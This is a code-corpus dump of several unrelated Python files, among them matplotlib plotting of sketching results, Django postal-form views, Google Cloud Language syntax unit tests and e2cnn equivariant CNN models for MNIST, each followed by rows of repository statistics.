plt.ylabel('sigma: time/time')
plt.title('n_{}_d_{}_p_{}'.format(n, d, p))
plt.legend()
plt.savefig('./plots/{}/'.format(mode) + 'sigma:n_{}_d_{}_p_{}.png'.format(n, d, p))
plt.clf()
if (mode == 'tensorsketch'):
plt.plot(x_axis, sigma_approx, color='green', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='tensorsketch')
plt.plot(x_axis, sigma_approx_ttsketch['cs'], color='red', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='cs')
if (mode == 'ttsketch'):
plt.plot(x_axis, sigma_approx_ttsketch['srht'], color='blue', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='srht')
plt.plot(x_axis, sigma_approx_ttsketch['seg'], color='pink', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='seg')
plt.ylim(0, 3.0)
plt.xlabel('K: sketch rows')
plt.ylabel('sigma_approx: time/time')
plt.title('n_{}_d_{}_p_{}'.format(n, d, p))
plt.legend()
plt.savefig('./plots/{}/'.format(mode) + 'sigma_approx:n_{}_d_{}_p_{}.png'.format(n, d, p))
plt.clf()
if (mode == 'tensorsketch'):
plt.plot(x_axis, sigma_sketch, color='green', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='tensorsketch')
plt.plot(x_axis, sigma_sketch_ttsketch['cs'], color='red', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='cs')
if (mode == 'ttsketch'):
print(sigma_sketch_ttsketch['srht'], 'mark')
plt.plot(x_axis, sigma_sketch_ttsketch['srht'], color='blue', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='srht')
plt.plot(x_axis, sigma_sketch_ttsketch['seg'], color='pink', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='seg')
plt.ylim(0, 3.0)
plt.xlabel('K: sketch rows')
plt.ylabel('sigma_sketch: time/time')
plt.title('n_{}_d_{}_p_{}'.format(n, d, p))
plt.legend()
plt.savefig('./plots/{}/'.format(mode) + 'sigma_sketch:n_{}_d_{}_p_{}.png'.format(n, d, p))
plt.clf()
if (mode == 'tensorsketch'):
plt.plot(x_axis, gamma, color='green', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='tensorsketch')
plt.plot(x_axis, gamma_ttsketch['cs'], color='red', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='cs')
if (mode == 'ttsketch'):
plt.plot(x_axis, gamma_ttsketch['srht'], color='blue', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='srht')
plt.plot(x_axis, gamma_ttsketch['seg'], color='pink', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='seg')
plt.ylim(0, 0.2)
plt.xlabel('K: sketch rows')
plt.ylabel('gamma: eval/eval - 1')
plt.title('n_{}_d_{}_p_{}'.format(n, d, p))
plt.legend()
plt.savefig('./plots/{}/'.format(mode) + 'gamma:n_{}_d_{}_p_{}.png'.format(n, d, p))
plt.clf()
| 38.941489
| 100
| 0.627783
| 1,042
| 7,321
| 4.197697
| 0.102687
| 0.011888
| 0.017833
| 0.043896
| 0.826246
| 0.810242
| 0.80567
| 0.755373
| 0.747371
| 0.727252
| 0
| 0.01982
| 0.179893
| 7,321
| 188
| 101
| 38.941489
| 0.708694
| 0.007786
| 0
| 0.541667
| 0
| 0
| 0.152128
| 0.045949
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.005952
| 0.029762
| 0
| 0.029762
| 0.005952
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1df73698a1d13a279004ced94fe8290ef40143dc
| 1,624
|
py
|
Python
|
postal_project/views.py
|
michael-hahn/django-postal
|
082000839b20a8ee0aeaa6f8c76cc459409310e4
|
[
"MIT"
] | 6
|
2015-01-07T10:01:00.000Z
|
2020-03-23T21:28:12.000Z
|
postal_project/views.py
|
michael-hahn/django-postal
|
082000839b20a8ee0aeaa6f8c76cc459409310e4
|
[
"MIT"
] | 5
|
2015-02-24T08:09:16.000Z
|
2015-11-25T10:02:07.000Z
|
postal_project/views.py
|
michael-hahn/django-postal
|
082000839b20a8ee0aeaa6f8c76cc459409310e4
|
[
"MIT"
] | 8
|
2015-01-30T05:49:54.000Z
|
2021-08-17T22:06:33.000Z
|
from django import forms
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from postal.library import country_map
from postal.forms import PostalAddressForm
def test_postal(request):
countries = []
for k,v in country_map.items():
countries.append(k)
result = ""
if request.method == "POST":
form = PostalAddressForm(request.POST, prefix=request.POST.get('prefix', ''))
if form.is_valid():
for k,v in form.cleaned_data.items():
result = result + k + " -> " + v + "<br/>"
context = RequestContext(request, locals())
return render_to_response('postal/test.html', context)
else:
form = PostalAddressForm() # An unbound form
context = RequestContext(request, locals())
return render_to_response('postal/test.html', context)
def test_postal_json(request):
countries = []
for k,v in country_map.items():
countries.append(k)
result = ""
if request.method == "POST":
form = PostalAddressForm(request.POST, prefix=request.POST.get('prefix', ''))
if form.is_valid():
for k,v in form.cleaned_data.items():
result = result + k + " -> " + v + "<br/>"
context = RequestContext(request, locals())
return render_to_response('postal/test.html', context)
else:
form = PostalAddressForm() # An unbound form
context = RequestContext(request, locals())
return render_to_response('postal/test_json.html', context)
| 35.304348
| 85
| 0.637931
| 186
| 1,624
| 5.456989
| 0.252688
| 0.011823
| 0.078818
| 0.027586
| 0.747783
| 0.747783
| 0.747783
| 0.747783
| 0.747783
| 0.747783
| 0
| 0
| 0.244458
| 1,624
| 46
| 86
| 35.304348
| 0.827221
| 0.019089
| 0
| 0.763158
| 0
| 0
| 0.067253
| 0.013199
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.157895
| 0
| 0.315789
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6974603d0606b0570d54852a9a8515815ba88da1
| 147
|
py
|
Python
|
common/__init__.py
|
Chenhuping/flask-restful-example
|
8ddbca623e80684ea7fd9fce851b2c9251601dcc
|
[
"MIT"
] | 1
|
2019-06-27T01:03:38.000Z
|
2019-06-27T01:03:38.000Z
|
common/__init__.py
|
Chenhuping/flask-restful-example
|
8ddbca623e80684ea7fd9fce851b2c9251601dcc
|
[
"MIT"
] | null | null | null |
common/__init__.py
|
Chenhuping/flask-restful-example
|
8ddbca623e80684ea7fd9fce851b2c9251601dcc
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from .code import Code, CODE_MSG_MAP
from .utils import pretty_result
__all__ = ['Code', 'CODE_MSG_MAP', 'pretty_result']
| 24.5
| 51
| 0.707483
| 22
| 147
| 4.272727
| 0.545455
| 0.170213
| 0.234043
| 0.297872
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007874
| 0.136054
| 147
| 5
| 52
| 29.4
| 0.732283
| 0.142857
| 0
| 0
| 0
| 0
| 0.233871
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
69950aaf6ddba01b5fdb2f466cc25a58c80cf310
| 54
|
py
|
Python
|
Chap02_Multi_Armed_Bandit/gym_n_bandit/envs/__init__.py
|
quangnguyendang/Reinforcement_Learning
|
2551ce95068561c553500838ee6b976f001ba667
|
[
"MIT"
] | null | null | null |
Chap02_Multi_Armed_Bandit/gym_n_bandit/envs/__init__.py
|
quangnguyendang/Reinforcement_Learning
|
2551ce95068561c553500838ee6b976f001ba667
|
[
"MIT"
] | null | null | null |
Chap02_Multi_Armed_Bandit/gym_n_bandit/envs/__init__.py
|
quangnguyendang/Reinforcement_Learning
|
2551ce95068561c553500838ee6b976f001ba667
|
[
"MIT"
] | null | null | null |
from gym_n_bandit.envs.n_bandit_env import NBanditEnv
| 27
| 53
| 0.888889
| 10
| 54
| 4.4
| 0.8
| 0.318182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 54
| 1
| 54
| 54
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
69a5950eaf3d0a3e94508f1c9771460a312356ef
| 122
|
py
|
Python
|
Section08_Composite/Practice/ManyValues.py
|
enriqueescobar-askida/Kinito.Python
|
e4c5521e771c4de0ceaf81776a4a61f7de01edb4
|
[
"MIT"
] | 1
|
2020-10-20T07:41:51.000Z
|
2020-10-20T07:41:51.000Z
|
Section08_Composite/Practice/ManyValues.py
|
enriqueescobar-askida/Kinito.Python
|
e4c5521e771c4de0ceaf81776a4a61f7de01edb4
|
[
"MIT"
] | null | null | null |
Section08_Composite/Practice/ManyValues.py
|
enriqueescobar-askida/Kinito.Python
|
e4c5521e771c4de0ceaf81776a4a61f7de01edb4
|
[
"MIT"
] | null | null | null |
from Section08_Composite.Practice.ValueContainer import ValueContainer
class ManyValues(list, ValueContainer):
pass
| 20.333333
| 70
| 0.836066
| 12
| 122
| 8.416667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018519
| 0.114754
| 122
| 5
| 71
| 24.4
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
387257353ccbc1f078976024c28726a2c8f9a7ea
| 8,614
|
py
|
Python
|
language/tests/unit/test_syntax.py
|
rodrigodias27/google-cloud-python
|
7d1161f70744c0dbbe67a3f472ea95667eaafe50
|
[
"Apache-2.0"
] | null | null | null |
language/tests/unit/test_syntax.py
|
rodrigodias27/google-cloud-python
|
7d1161f70744c0dbbe67a3f472ea95667eaafe50
|
[
"Apache-2.0"
] | null | null | null |
language/tests/unit/test_syntax.py
|
rodrigodias27/google-cloud-python
|
7d1161f70744c0dbbe67a3f472ea95667eaafe50
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
class TestPartOfSpeech(unittest.TestCase):
@staticmethod
def _get_target_class():
from google.cloud.language.syntax import PartOfSpeech
return PartOfSpeech
def test_reverse(self):
klass = self._get_target_class()
for attr in dir(klass):
if attr.startswith('_'):
continue
if attr.islower():
continue
value = getattr(klass, attr)
result = klass.reverse(value)
self.assertEqual(result, attr)
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_constructor(self):
aspect = 'ASPECT_UNKNOWN'
reciprocity = 'RECIPROCITY_UNKNOWN'
case = 'NOMINATIVE'
mood = 'MOOD_UNKNOWN'
tag = 'PRON'
person = 'FIRST'
number = 'SINGULAR'
tense = 'TENSE_UNKNOWN'
form = 'FORM_UNKNOWN'
proper = 'PROPER_UNKNOWN'
voice = 'VOICE_UNKNOWN'
gender = 'GENDER_UNKNOWN'
pos = self._make_one(aspect, reciprocity, case, mood, tag, person,
number, tense, form, proper, voice, gender)
self.assertEqual(pos.aspect, aspect)
self.assertEqual(pos.reciprocity, reciprocity)
self.assertEqual(pos.case, case)
self.assertEqual(pos.mood, mood)
self.assertEqual(pos.tag, tag)
self.assertEqual(pos.person, person)
self.assertEqual(pos.number, number)
self.assertEqual(pos.tense, tense)
self.assertEqual(pos.form, form)
self.assertEqual(pos.proper, proper)
self.assertEqual(pos.voice, voice)
self.assertEqual(pos.gender, gender)
def test_from_api_repr(self):
klass = self._get_target_class()
aspect = 'ASPECT_UNKNOWN'
reciprocity = 'RECIPROCITY_UNKNOWN'
case = 'NOMINATIVE'
mood = 'MOOD_UNKNOWN'
tag = 'PRON'
person = 'FIRST'
number = 'SINGULAR'
tense = 'TENSE_UNKNOWN'
form = 'FORM_UNKNOWN'
proper = 'PROPER_UNKNOWN'
voice = 'VOICE_UNKNOWN'
gender = 'GENDER_UNKNOWN'
payload = {
'aspect': aspect,
'reciprocity': reciprocity,
'case': case,
'mood': mood,
'tag': tag,
'person': person,
'number': number,
'tense': tense,
'form': form,
'proper': proper,
'voice': voice,
'gender': gender
}
pos = klass.from_api_repr(payload)
self.assertEqual(pos.aspect, aspect)
self.assertEqual(pos.reciprocity, reciprocity)
self.assertEqual(pos.case, case)
self.assertEqual(pos.mood, mood)
self.assertEqual(pos.tag, tag)
self.assertEqual(pos.person, person)
self.assertEqual(pos.number, number)
self.assertEqual(pos.tense, tense)
self.assertEqual(pos.form, form)
self.assertEqual(pos.proper, proper)
self.assertEqual(pos.voice, voice)
self.assertEqual(pos.gender, gender)
class TestToken(unittest.TestCase):
@staticmethod
def _get_target_class():
from google.cloud.language.syntax import Token
return Token
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_constructor(self):
from google.cloud.language.syntax import PartOfSpeech
text_content = 'All'
text_begin = -1
aspect = 'ASPECT_UNKNOWN'
reciprocity = 'RECIPROCITY_UNKNOWN'
case = 'NOMINATIVE'
mood = 'MOOD_UNKNOWN'
tag = 'PRON'
person = 'FIRST'
number = 'SINGULAR'
tense = 'TENSE_UNKNOWN'
form = 'FORM_UNKNOWN'
proper = 'PROPER_UNKNOWN'
voice = 'VOICE_UNKNOWN'
gender = 'GENDER_UNKNOWN'
part_of_speech = PartOfSpeech(aspect, reciprocity, case, mood, tag, person,
number, tense, form, proper, voice, gender)
edge_index = 3
edge_label = 'PREDET'
lemma = text_content
token = self._make_one(text_content, text_begin, part_of_speech,
edge_index, edge_label, lemma)
self.assertEqual(token.text_content, text_content)
self.assertEqual(token.text_begin, text_begin)
self.assertEqual(token.part_of_speech.aspect, part_of_speech.aspect)
self.assertEqual(token.part_of_speech.reciprocity, part_of_speech.reciprocity)
self.assertEqual(token.part_of_speech.case, part_of_speech.case)
self.assertEqual(token.part_of_speech.mood, part_of_speech.mood)
self.assertEqual(token.part_of_speech.tag, part_of_speech.tag)
self.assertEqual(token.part_of_speech.person, part_of_speech.person)
self.assertEqual(token.part_of_speech.number, part_of_speech.number)
self.assertEqual(token.part_of_speech.tense, part_of_speech.tense)
self.assertEqual(token.part_of_speech.form, part_of_speech.form)
self.assertEqual(token.part_of_speech.proper, part_of_speech.proper)
self.assertEqual(token.part_of_speech.voice, part_of_speech.voice)
self.assertEqual(token.part_of_speech.gender, part_of_speech.gender)
self.assertEqual(token.edge_index, edge_index)
self.assertEqual(token.edge_label, edge_label)
self.assertEqual(token.lemma, lemma)
def test_from_api_repr(self):
klass = self._get_target_class()
text_content = 'pretty'
text_begin = -1
aspect = 'ASPECT_UNKNOWN'
reciprocity = 'RECIPROCITY_UNKNOWN'
case = 'NOMINATIVE'
mood = 'MOOD_UNKNOWN'
tag = 'PRON'
person = 'FIRST'
number = 'SINGULAR'
tense = 'TENSE_UNKNOWN'
form = 'FORM_UNKNOWN'
proper = 'PROPER_UNKNOWN'
voice = 'VOICE_UNKNOWN'
gender = 'GENDER_UNKNOWN'
part_of_speech = {
'aspect': aspect,
'reciprocity': reciprocity,
'case': case,
'mood': mood,
'tag': tag,
'person': person,
'number': number,
'tense': tense,
'form': form,
'proper': proper,
'voice': voice,
'gender': gender
}
edge_index = 3
edge_label = 'AMOD'
lemma = text_content
payload = {
'text': {
'content': text_content,
'beginOffset': text_begin,
},
'partOfSpeech': part_of_speech,
'dependencyEdge': {
'headTokenIndex': edge_index,
'label': edge_label,
},
'lemma': lemma,
}
token = klass.from_api_repr(payload)
self.assertEqual(token.text_content, text_content)
self.assertEqual(token.text_begin, text_begin)
self.assertEqual(token.part_of_speech.aspect, part_of_speech['aspect'])
self.assertEqual(token.part_of_speech.reciprocity, part_of_speech['reciprocity'])
self.assertEqual(token.part_of_speech.case, part_of_speech['case'])
self.assertEqual(token.part_of_speech.mood, part_of_speech['mood'])
self.assertEqual(token.part_of_speech.tag, part_of_speech['tag'])
self.assertEqual(token.part_of_speech.person, part_of_speech['person'])
self.assertEqual(token.part_of_speech.number, part_of_speech['number'])
self.assertEqual(token.part_of_speech.tense, part_of_speech['tense'])
self.assertEqual(token.part_of_speech.form, part_of_speech['form'])
self.assertEqual(token.part_of_speech.proper, part_of_speech['proper'])
self.assertEqual(token.part_of_speech.voice, part_of_speech['voice'])
self.assertEqual(token.part_of_speech.gender, part_of_speech['gender'])
self.assertEqual(token.edge_index, edge_index)
self.assertEqual(token.edge_label, edge_label)
self.assertEqual(token.lemma, lemma)
| 37.947137
| 89
| 0.623868
| 966
| 8,614
| 5.34265
| 0.141822
| 0.171478
| 0.120907
| 0.111606
| 0.809146
| 0.809146
| 0.796551
| 0.776206
| 0.776206
| 0.776206
| 0
| 0.001921
| 0.274901
| 8,614
| 226
| 90
| 38.115044
| 0.824368
| 0.063617
| 0
| 0.688776
| 0
| 0
| 0.10457
| 0
| 0
| 0
| 0
| 0
| 0.30102
| 1
| 0.045918
| false
| 0
| 0.020408
| 0.010204
| 0.096939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2a2877c68062c50e71a4299f0bbd89c7a8d70464
| 11,831
|
py
|
Python
|
advbench/models/e2_mnist.py
|
constrainedlearning/advbench
|
68f9f6d77268aad45517ca84d383b996724cc976
|
[
"MIT"
] | null | null | null |
advbench/models/e2_mnist.py
|
constrainedlearning/advbench
|
68f9f6d77268aad45517ca84d383b996724cc976
|
[
"MIT"
] | null | null | null |
advbench/models/e2_mnist.py
|
constrainedlearning/advbench
|
68f9f6d77268aad45517ca84d383b996724cc976
|
[
"MIT"
] | null | null | null |
from e2cnn.nn import *
from e2cnn.gspaces import *
import torch
import torch.nn as nn
import numpy as np
## MNIST
class E2SFCNN_QUOT(torch.nn.Module):
def __init__(self, n_channels, n_classes,
N=16,
restrict: int = -1,
fix_param: bool = True,
fco: float = None,
p_drop_fully: float = 0.3,
J: int = 0,
sigma: float = None,
sgsize: int = None,
flip: bool = False,
):
super(E2SFCNN_QUOT, self).__init__()
if N is None:
N = 16
assert N > 1
self.N = N
self.n_channels = n_channels
self.n_classes = n_classes
# build the group O(2) or D_N depending on the number N of rotations specified
if N > 1:
self.gspace = FlipRot2dOnR2(N)
elif N == 1:
self.gspace = Flip2dOnR2()
else:
raise ValueError(N)
# if flips are not required, immediately restrict to the SO(2) or C_N subgroup
if not flip:
if N != 1:
sg = (None, N)
else:
sg = 1
self.gspace, _, _ = self.gspace.restrict(sg)
# id of the subgroup if group restriction is applied through the network
if sgsize is not None:
self.sgid = sgsize
else:
self.sgid = N
if flip and N != 1:
self.sgid = (None, self.sgid)
if fco is not None and fco > 0.:
fco *= np.pi
self.frequencies_cutoff = fco
self.sigma = sigma
self.J = J
self.fix_param = fix_param
self.restrict = restrict
eq_layers = []
self.LAYER = 0
if restrict == self.LAYER:
gspace, _, _ = self.gspace.restrict(self.sgid)
r1 = FieldType(gspace, [gspace.trivial_repr] * n_channels)
# 28 px
# Convolutional Layer 1
self.LAYER += 1
eq_layers += self.build_layer_quotient(r1, 24, 9, 0, None)
# Convolutional Layer 2
self.LAYER += 1
eq_layers += self.build_layer_quotient(eq_layers[-1].out_type, 32, 7, 3, 2)
# 14 px
# Convolutional Layer 3
self.LAYER += 1
eq_layers += self.build_layer_quotient(eq_layers[-1].out_type, 36, 7, 3, None)
# Convolutional Layer 4
self.LAYER += 1
eq_layers += self.build_layer_quotient(eq_layers[-1].out_type, 36, 7, 3, 2)
# 7 px
# Convolutional Layer 5
self.LAYER += 1
eq_layers += self.build_layer_quotient(eq_layers[-1].out_type, 64, 7, 3)
# Convolutional Layer 6
self.LAYER += 1
eq_layers += self.build_layer_quotient(eq_layers[-1].out_type, 96, 5, 0, None, True)
# Adaptive Pooling
mpl = PointwiseAdaptiveMaxPool(eq_layers[-1].out_type, 1)
eq_layers.append(mpl)
# 1 px
# c = 96
c = eq_layers[-1].out_type.size
self.in_repr = eq_layers[0].in_type
self.eq_layers = torch.nn.ModuleList(eq_layers)
# Fully Connected
self.fully_net = nn.Sequential(
nn.Dropout(p=p_drop_fully),
nn.Linear(c, 96),
nn.BatchNorm1d(96),
nn.ELU(inplace=True),
nn.Dropout(p=p_drop_fully),
nn.Linear(96, 96),
nn.BatchNorm1d(96),
nn.ELU(inplace=True),
nn.Dropout(p=p_drop_fully),
nn.Linear(96, n_classes),
)
def forward(self, input: torch.tensor):
x = GeometricTensor(input, self.in_repr)
for layer in self.eq_layers:
x = layer(x)
x = self.fully_net(x.tensor.reshape(x.tensor.shape[0], -1))
return x
def build_quotient_feature_type(self, gspace):
assert gspace.fibergroup.order() > 0
if isinstance(gspace, FlipRot2dOnR2):
n = int(gspace.fibergroup.order() / 2)
repr = [gspace.regular_repr] * 5
for i in [0, round(n / 4), round(n / 2)]:
repr += [gspace.quotient_repr((int(i), 1))] * 2
repr += [gspace.quotient_repr((None, int(n / 2)))] * 2
repr += [gspace.trivial_repr] * int(gspace.fibergroup.order() / 4)
elif isinstance(gspace, Rot2dOnR2):
n = gspace.fibergroup.order()
repr = [gspace.regular_repr] * 5
repr += [gspace.quotient_repr(int(round(n / 2)))] * 2
repr += [gspace.quotient_repr(int(round(n / 4)))] * 2
repr += [gspace.trivial_repr] * int(gspace.fibergroup.order() / 4)
else:
repr = [gspace.regular_repr]
return repr
def build_layer_quotient(self, r1: FieldType, C: int, s: int, padding: int = 0, pooling: int = None,
orientation_pooling: bool = False):
gspace = r1.gspace
if self.fix_param and not orientation_pooling and self.LAYER > 1:
# to keep number of parameters more or less constant when changing groups
# (more precisely, we try to keep them close to the number of parameters in the original SFCNN)
t = gspace.fibergroup.order() / 16
C = C / np.sqrt(t)
layers = []
repr = self.build_quotient_feature_type(gspace)
C /= sum([r.size for r in repr]) / gspace.fibergroup.order()
C = int(round(C))
r2 = FieldType(gspace, repr * C).sorted()
cl = R2Conv(r1, r2, s,
frequencies_cutoff=self.frequencies_cutoff,
padding=padding,
sigma=self.sigma,
maximum_offset=self.J)
layers.append(cl)
if self.restrict == self.LAYER:
layers.append(RestrictionModule(layers[-1].out_type, self.sgid))
layers.append(DisentangleModule(layers[-1].out_type))
if orientation_pooling:
pl = GroupPooling(layers[-1].out_type)
layers.append(pl)
bn = InnerBatchNorm(layers[-1].out_type)
layers.append(bn)
nnl = ELU(layers[-1].out_type, inplace=True)
layers.append(nnl)
if pooling is not None:
pl = PointwiseMaxPool(layers[-1].out_type, pooling)
layers.append(pl)
return layers
class E2SFCNN(torch.nn.Module):
def __init__(self, n_channels, n_classes,
N=16,
restrict: int = -1,
fix_param: bool = True,
fco: float = None,
p_drop_fully: float = 0.3,
J: int = 0,
sigma: float = None,
sgsize: int = None,
flip: bool = False,
):
super(E2SFCNN, self).__init__()
if N is None:
N = 16
assert N > 1
self.n_channels = n_channels
self.n_classes = n_classes
# build the group O(2) or D_N depending on the number N of rotations specified
if N > 1:
self.gspace = FlipRot2dOnR2(N)
elif N == 1:
self.gspace = Flip2dOnR2()
else:
raise ValueError(N)
# if flips are not required, immediately restrict to the SO(2) or C_N subgroup
if not flip:
if N != 1:
sg = (None, N)
else:
sg = 1
self.gspace, _, _ = self.gspace.restrict(sg)
# id of the subgroup if group restriction is applied through the network
if sgsize is not None:
self.sgid = sgsize
else:
self.sgid = N
if flip and N != 1:
self.sgid = (None, self.sgid)
if fco is not None and fco > 0.:
fco *= np.pi
frequencies_cutoff = fco
eq_layers = []
LAYER = 0
def build_layers(r1: FieldType, C: int, s: int, padding: int = 0, pooling: int = None, orientantion_pooling: bool = False):
gspace = r1.gspace
if fix_param:
# to keep number of parameters more or less constant when changing groups
# (more precisely, we try to keep them close to the number of parameters in the original SFCNN)
C /= np.sqrt(gspace.fibergroup.order()/16)
C = int(C)
layers = []
r2 = FieldType(gspace, [gspace.representations['regular']] * C)
cl = R2Conv(r1, r2, s,
frequencies_cutoff=frequencies_cutoff,
padding=padding,
sigma=sigma,
maximum_offset=J)
layers.append(cl)
if restrict == LAYER:
layers.append(RestrictionModule(layers[-1].out_type, self.sgid))
layers.append(DisentangleModule(layers[-1].out_type))
bn = InnerBatchNorm(layers[-1].out_type)
layers.append(bn)
if orientantion_pooling:
pl = GroupPooling(layers[-1].out_type)
layers.append(pl)
if pooling is not None:
pl = PointwiseMaxPool(layers[-1].out_type, pooling)
layers.append(pl)
nnl = ELU(layers[-1].out_type, inplace=True)
layers.append(nnl)
return layers
if restrict == LAYER:
self.gspace, _, _ = self.gspace.restrict(self.sgid)
r1 = FieldType(self.gspace, [self.gspace.trivial_repr] * n_channels)
# 28 px
# Convolutional Layer 1
LAYER += 1
#TODO no padding here? with such a large filter???
eq_layers += build_layers(r1, 24, 9, 0, None)
# Convolutional Layer 2
LAYER += 1
eq_layers += build_layers(eq_layers[-1].out_type, 32, 7, 3, 2)
# TODO this number is right iff we used padding in the first layer!
# 14 px
# Convolutional Layer 3
LAYER += 1
eq_layers += build_layers(eq_layers[-1].out_type, 36, 7, 3, None)
# Convolutional Layer 4
LAYER += 1
eq_layers += build_layers(eq_layers[-1].out_type, 36, 7, 3, 2)
# 7 px
# Convolutional Layer 5
LAYER += 1
eq_layers += build_layers(eq_layers[-1].out_type, 64, 7, 3)
# Convolutional Layer 6
LAYER += 1
eq_layers += build_layers(eq_layers[-1].out_type, 96, 5, 0, None, True)
# Adaptive Pooling
mpl = PointwiseAdaptiveMaxPool(eq_layers[-1].out_type, 1)
eq_layers.append(mpl)
# 1 px
# c = 96
c = eq_layers[-1].out_type.size
self.in_repr = eq_layers[0].in_type
self.eq_layers = torch.nn.ModuleList(eq_layers)
# Fully Connected
self.fully_net = nn.Sequential(
nn.Dropout(p=p_drop_fully),
nn.Linear(c, 96),
nn.BatchNorm1d(96),
nn.ELU(inplace=True),
nn.Dropout(p=p_drop_fully),
nn.Linear(96, 96),
nn.BatchNorm1d(96),
nn.ELU(inplace=True),
nn.Dropout(p=p_drop_fully),
nn.Linear(96, n_classes),
)
def forward(self, input):
x = GeometricTensor(input, self.in_repr)
for layer in self.eq_layers:
x = layer(x)
x = self.fully_net(x.tensor.reshape(x.tensor.shape[0], -1))
return x
| 31.134211
| 131
| 0.514327
| 1,424
| 11,831
| 4.13764
| 0.135534
| 0.051595
| 0.044128
| 0.061779
| 0.811779
| 0.765275
| 0.760692
| 0.729124
| 0.704684
| 0.681263
| 0
| 0.034226
| 0.387541
| 11,831
| 380
| 132
| 31.134211
| 0.778913
| 0.10912
| 0
| 0.692623
| 0
| 0
| 0.000667
| 0
| 0
| 0
| 0
| 0.002632
| 0.012295
| 1
| 0.028689
| false
| 0
| 0.020492
| 0
| 0.077869
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2a30128b8d5360e095d62eba30b00b05ac74908e
| 58
|
py
|
Python
|
test/test_app.py
|
elliottmurray/python_sdk
|
d7df240af054243756a10fbb895225c0e4c4fd99
|
[
"MIT"
] | null | null | null |
test/test_app.py
|
elliottmurray/python_sdk
|
d7df240af054243756a10fbb895225c0e4c4fd99
|
[
"MIT"
] | null | null | null |
test/test_app.py
|
elliottmurray/python_sdk
|
d7df240af054243756a10fbb895225c0e4c4fd99
|
[
"MIT"
] | null | null | null |
import pytest
def test_answer():
assert True == True
| 11.6
| 23
| 0.689655
| 8
| 58
| 4.875
| 0.875
| 0
| 0
| 0
| 0
| 0
